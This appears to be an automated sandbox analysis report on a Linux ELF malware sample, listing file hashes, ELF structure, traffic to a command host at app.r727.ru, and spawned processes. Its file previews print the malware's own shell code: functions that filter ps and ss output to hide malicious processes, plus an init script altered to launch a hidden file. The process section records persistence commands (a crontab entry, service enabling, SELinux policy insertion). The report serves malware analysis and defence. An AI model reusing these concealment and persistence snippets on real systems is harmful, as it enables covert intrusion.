SHA-512:	AAA3B8EC1B82F46E3FA10ADDF3BB9B7E4FC93B9B575BCD5D4BCE712F17117F10059BF0A0E827982B613422E8FE009F31B8ED68B3B9F4EF2202A73E155CDD4279
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system.mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system.mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system.mar

/etc/profile.d/bash.cfg.sh

Download File

Process:	/tmp/386.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.204582217613529
Encrypted:	false
SSDEEP:	3:TKH/binKX:siKX
MD5:	5C67BC6A39813CE4346CB7CA206A9393
SHA1:	F99586987650CFA169F5110198CBDE17B82FD2BA
SHA-256:	29EC88CF1C7403CC92602408772AB2FCE6E26E10E29E0C19F6FCF03AC6E1B483
SHA-512:	BF8701863EB49B3552181620944D05C23C63762E386D6C353609DE3D71784CB87E054F279FE56A1C661C927813DEF4481586E3BC5C820D20DCEC7F3F891F2A8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash.cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/386.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (698)
Category:	dropped
Size (bytes):	4855
Entropy (8bit):	4.802800019649059
Encrypted:	false
SSDEEP:	96:sSr2vBOPmf2/cSr2vBOPmf2/GSr2vBOPmf2/OSr2vBOPmf2/kSr2vBOPmf2/kSrs:si2vBOPmf2/ci2vBOPmf2/Gi2vBOPmf7
MD5:	BB0F8943F59F86C689C55D841A4FA27A
SHA1:	A037507193675B6F30FFE9EF439D7F003469849D
SHA-256:	98A2F8AF9D5D58DBD20832C34FE84C3E9B91D60E29DBF6E3679D9E341E7F621A
SHA-512:	8053C0E9A72F177AAD3075E0FF9944DD1A17FDFCF2518DB4C5463298DDE19FFB6BFC8C8955402224F71D7BF1AB3D2AC153899EEC0875C3608DABEACFE6130298
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" \| sed -e '/system.mark/d');proc_name=$(echo "$proc_name" \| sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/386.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(echo "$

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/5578/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5667/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5673/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:GIQon:GIzn
MD5:	CC074657397AC13CDBE3E6201F0C91DA
SHA1:	5DC5D0DDB0AE31905AD636AA55245C645D5649D6
SHA-256:	A2673D8DB9989F0663C8FFB29C8BAB213E04E868492A4D8FD41B9140FD09738C
SHA-512:	89563C7E2CC8A3B0B88A9DE1C5F666DD387DADF81974611D87A8B9848A4C36D3865783DA7EBC265C3A6450A70B56A6790CC101564E44947ACB2D556D3465EB3B
Malicious:	false
Preview:	5693.5693.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, Go BuildID=CHlJyHyAMWcMQkb_HBE3/2KbK2qnRIA6gDZeNYtnT/OpvHoMnRg2HlERj_U8gv/UCPa1NOEjcE3qLJf6JN7, stripped
Entropy (8bit):	6.268229505754035
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	386.elf
File size:	5'128'192 bytes
MD5:	2e2c8be0fb51f7fa433e76a43a2621ba
SHA1:	52c5d7aaec88d95e6b4c4389b43b33ebd820f898
SHA256:	40b485a176314f7a8ba7a4f2d960de23724b52971cb43c9d5924e7b61451999b
SHA512:	7f83744f20b390e62dce7fea4deaec384b8ff03daa45bcf3026142d35fd6d7ffd2b34e81fe0e258a648c326bfe5552530e06ac40bf6354ac527788a6e9fd1b1c
SSDEEP:	49152:pYQhABz/zHgZCi0X+quHS+PRRf81XJzvk5hfpe6qiVF8n4tgP1ibRTPVnexca8hH:GBBSeX+quHSkREt4cx8
TLSH:	16363950FACB44F6EA031E3144ABB27F67315D058B25DB87EA507F2AE9776D2083621C
File Content Preview:	.ELF.....................)..4...........4. ...(.........4...4...4...................................d...d............................['..['..............`'...+...+.D.".D."...............I...N...N.....hu..........Q.td.......................................

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80b29f0
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	6
Section Header Offset:	244
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	3

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x8049000	0x1000	0x274bbd	0x0	0x6	AX	16
.rodata	PROGBITS	0x82be000	0x276000	0xcc9e0	0x0	0x2	A	32
.shstrtab	STRTAB	0x0	0x3429e0	0x98	0x0	0x0		1
.typelink	PROGBITS	0x838aa80	0x342a80	0x1704	0x0	0x2	A	32
.itablink	PROGBITS	0x838c1a0	0x3441a0	0x48c	0x0	0x2	A	32
.gosymtab	PROGBITS	0x838c62c	0x34462c	0x0	0x0	0x2	A	1
.gopclntab	PROGBITS	0x838c640	0x344640	0x152d04	0x0	0x2	A	32
.go.buildinfo	PROGBITS	0x84e0000	0x498000	0x150	0x0	0x3	WA	16
.noptrdata	PROGBITS	0x84e0160	0x498160	0x468e0	0x0	0x3	WA	32
.data	PROGBITS	0x8526a40	0x4dea40	0x4a88	0x0	0x3	WA	32
.bss	NOBITS	0x852b4e0	0x4e34e0	0x13d98	0x0	0x3	WA	32
.noptrbss	NOBITS	0x853f280	0x4f7280	0x82e8	0x0	0x3	WA	32
.note.go.buildid	NOTE	0x8048f9c	0xf9c	0x64	0x0	0x2	A	4

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
PHDR	0x34	0x8048034	0x8048034	0xc0	0xc0	2.8901	0x4	R	0x1000
NOTE	0xf9c	0x8048f9c	0x8048f9c	0x64	0x64	5.2972	0x4	R	0x4	.note.go.buildid
LOAD	0x0	0x8048000	0x8048000	0x275bbd	0x275bbd	6.0467	0x5	R E	0x1000	.text .note.go.buildid
LOAD	0x276000	0x82be000	0x82be000	0x221344	0x221344	5.7811	0x4	R	0x1000	.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x498000	0x84e0000	0x84e0000	0x4b4e0	0x67568	6.4746	0x6	RW	0x1000	.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 15:37:54.530366898 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:54.535178900 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:54.535259962 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:54.538167953 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:54.542992115 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:55.304186106 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:55.304202080 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:55.304337025 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:55.304337025 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:55.310445070 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:55.315061092 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:55.315233946 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:55.319837093 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:57.007046938 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:57.007306099 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:37:59.524405003 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:37:59.524508953 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:02.060818911 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:02.060982943 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:02.971267939 CET	46540	443	192.168.2.14	185.125.190.26
Jan 8, 2025 15:38:04.581568956 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:04.581763983 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:07.109685898 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:07.109911919 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:09.623684883 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:09.623900890 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:12.146549940 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:12.146792889 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:14.677812099 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:14.678129911 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:17.191216946 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:17.191518068 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:19.735658884 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:19.736048937 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:22.244817972 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:22.245069027 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:24.763362885 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:24.763726950 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:27.290741920 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:27.291071892 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:29.848543882 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:29.848783970 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:32.407521963 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:32.407902002 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:33.950306892 CET	46540	443	192.168.2.14	185.125.190.26
Jan 8, 2025 15:38:34.952465057 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:34.952723980 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:37.497019053 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:37.497234106 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:40.030273914 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:40.030464888 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:42.555340052 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:42.555546045 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:45.089294910 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:45.089415073 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:47.614021063 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:47.614197969 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:50.143205881 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:50.143413067 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:52.683495998 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:52.683733940 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:55.216731071 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:55.217036009 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:38:57.751898050 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:38:57.752053976 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:00.267834902 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:00.268083096 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:02.809657097 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:02.809909105 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:05.342962027 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:05.343077898 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:07.835081100 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:07.835306883 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:10.373456955 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:10.373573065 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:15.427190065 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:15.427371979 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:17.950424910 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:17.950714111 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:20.495326996 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:20.495532036 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:23.023340940 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:23.023612976 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:25.573113918 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:25.573456049 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:28.094243050 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:28.094460964 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:30.630342960 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:30.630641937 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:33.162873030 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:33.163121939 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:35.717515945 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:35.717762947 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:38.255454063 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:38.255692959 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:40.779721975 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:40.779843092 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:43.308777094 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:43.309015036 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:45.845128059 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:45.845276117 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:48.369524956 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:48.369772911 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:50.909828901 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:50.910145044 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:53.435950994 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:53.436115026 CET	50448	2070	192.168.2.14	186.2.171.38
Jan 8, 2025 15:39:55.969976902 CET	2070	50448	186.2.171.38	192.168.2.14
Jan 8, 2025 15:39:55.970235109 CET	50448	2070	192.168.2.14	186.2.171.38

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 15:37:54.493376017 CET	55008	53	192.168.2.14	1.1.1.1
Jan 8, 2025 15:37:54.493674994 CET	55351	53	192.168.2.14	1.1.1.1
Jan 8, 2025 15:37:54.500005960 CET	53	55008	1.1.1.1	192.168.2.14
Jan 8, 2025 15:37:54.500272989 CET	53	55351	1.1.1.1	192.168.2.14
Jan 8, 2025 15:37:54.516299009 CET	40457	53	192.168.2.14	1.1.1.1
Jan 8, 2025 15:37:54.518718958 CET	52046	53	192.168.2.14	1.1.1.1
Jan 8, 2025 15:37:54.525337934 CET	53	40457	1.1.1.1	192.168.2.14
Jan 8, 2025 15:37:54.527621031 CET	53	52046	1.1.1.1	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 15:37:54.493376017 CET	192.168.2.14	1.1.1.1	0x4406	Standard query (0)	www.google.com	28	IN (0x0001)	false
Jan 8, 2025 15:37:54.493674994 CET	192.168.2.14	1.1.1.1	0x87a9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:37:54.516299009 CET	192.168.2.14	1.1.1.1	0xc797	Standard query (0)	app.r727.ru	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:37:54.518718958 CET	192.168.2.14	1.1.1.1	0x2171	Standard query (0)	app.r727.ru	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 15:37:54.500005960 CET	1.1.1.1	192.168.2.14	0x4406	No error (0)	www.google.com		28	IN (0x0001)	false
Jan 8, 2025 15:37:54.500272989 CET	1.1.1.1	192.168.2.14	0x87a9	No error (0)	www.google.com	142.250.185.164	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:37:54.525337934 CET	1.1.1.1	192.168.2.14	0xc797	No error (0)	app.r727.ru	186.2.171.38	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: 386.elf PID: 5484, Parent PID: 5409

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	/tmp/386.elf
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: 386.elf PID: 5489, Parent PID: 5484

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: 386.elf PID: 5489, Parent PID: 5484

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	/tmp/386.elf
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: 386.elf PID: 5497, Parent PID: 5489

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: bash PID: 5497, Parent PID: 5489

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5498, Parent PID: 5497

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5498, Parent PID: 5497

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5502, Parent PID: 5497

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5502, Parent PID: 5497

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5506, Parent PID: 5497

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5506, Parent PID: 5497

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5507, Parent PID: 5497

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 5507, Parent PID: 5497

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: 386.elf PID: 5508, Parent PID: 5489

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: bash PID: 5508, Parent PID: 5489

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5509, Parent PID: 5508

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5510, Parent PID: 5508

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5511, Parent PID: 5508

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 386.elf PID: 5512, Parent PID: 5489

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: bash PID: 5512, Parent PID: 5489

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 386.elf PID: 5513, Parent PID: 5489

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: update-rc.d PID: 5513, Parent PID: 5489

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/update-rc.d
Arguments:	update-rc.d dns-udp4 defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 5514, Parent PID: 5513

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
